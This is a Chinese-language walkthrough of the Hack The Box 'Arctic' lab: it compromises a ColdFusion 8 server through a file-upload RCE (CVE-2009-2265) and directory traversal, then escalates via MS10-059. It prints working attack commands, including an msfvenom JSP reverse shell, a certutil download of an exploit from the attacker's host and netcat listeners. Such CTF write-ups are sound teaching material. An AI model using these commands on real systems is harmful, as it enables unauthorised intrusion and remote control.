这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机
勘探
nmap
nmap -sS -p 1-65535 10.10.10.11
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST
Nmap scan report for 10.10.10.11
Host is up (0.28s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds
发现打开了8500端口,
可以使用nc尝试连接一下
nc 10.10.10.11 8500
等三十秒发现返回了一个报文
HTTP/1.0 200 OK
Date: Thu, 14 May 2020 18:48:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server
<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ
</pre><hr></html>
再用web打开看一下,发现可以浏览文件夹,发现了CFIDE和cfdocs文件夹可以确定了是adobe的ColdFusion系统,那么进入/CFIDE/administrator文件夹发现cfm8版本那么搜索一下有什么漏洞
searchsploit coldfusion 8 1 ⨯
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
这里面有一个afe漏洞和一个baidu上广为流传的文件浏览
我们现在有两个获取shell的方向向量了
获取 tolis权限
RCE
首先利用afe漏洞
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
这一条我们打开一下看看
'CVE', '2009-2265' ],
[ 'OSVDB', '55684'],
只关注这一个,因为这是一个msf利用漏洞,我们不能直接利用,所以我们要自己找一个cve2009-2265利用poc,我们的利用poc是来自exploit的poc
注意复制粘贴后在文件内修改host,
if __name__ == '__main__':
# Define some information
lhost = '10.10.16.4'
lport = 4444
rhost = "10.10.10.11"
rport = 8500
filename = uuid.uuid4().hex
修改lhost和lport
有趣的是rhost不需要改,说明这个poc的作者也是在研究htb靶机的时候写的这个poc
这里利用脚本不需要nc监听,会直接打开shell
文件读取漏洞
Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com)
这个是漏洞利用的脚本,要是早一点看到官方文档就没有研究半天捅不出结果了,所以说,少看哪些不靠谱的漏洞利用攻略,老老实实看官方文档
后来我又在利用的时候忘记了靶机是windows系统,按照linux的文件系统去搜索了,又浪费了不少时间,我一度以为这个漏洞被修复了,直到后来我在用第一种方法获得shell之后查看文件目录的时候才意识到win的文件系统是不一样的
利用方法:
直接在地址栏按照利用方式进行访问就可以
这样可以访问密码文件,得到密码的sha1值,之后自行使用解密软件登录即可登录到后台管理系统
而后台管理存在一个文件上传部分,正好我们可以利用来与文件访问相配合获取shell
先用msf创建一个jsp文件
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp
接着打开python的服务器
python -m SimpleHTTPServers 80
然后通过创建一个任务来下载我们机器上的木马
debugging&Logging -> scheduled tasks -> schedule new task
然后在url处填写木马文件的地址
http://10.10.16.7/1.jsp然后submit提交过一会就会发现有一条请求发送到python上这时就是上传完毕了
然后我们发现我们上传的文件在刚刚8500端口的/CFIDE文件夹里,我们直接点击文件执行,然后这边打开nc监听
nc -lvnp 4444
搞定
提权至root权限
常规流程
想用systeminfo看一下配置
C:\>systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 14/5/2020, 9:38:49
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use: 848 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
然后用wes看一下有什么没打的补丁,用法看工具篇
root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
发现舍去需要进入可视化界面利用的ie漏洞,我们可以使用的漏洞还是非常多的
- MS10-047
- MS10-059
- MS10-061
- MS10-073
- MS11-011
- MS13-005
我们跟随0xdf使用ms10-059漏洞this GitHub from egre55
这个很简单
下载之后
上传可以使用python服务器然后用cerl传送
python -m SimpleHTTPServer 80
certutil.exe -urlcache -split -f "http://10.10.16.7/2.exe" 1.exe下载
./1.exe 10.10.16.7 4444使用
记得打开nc接收shell转发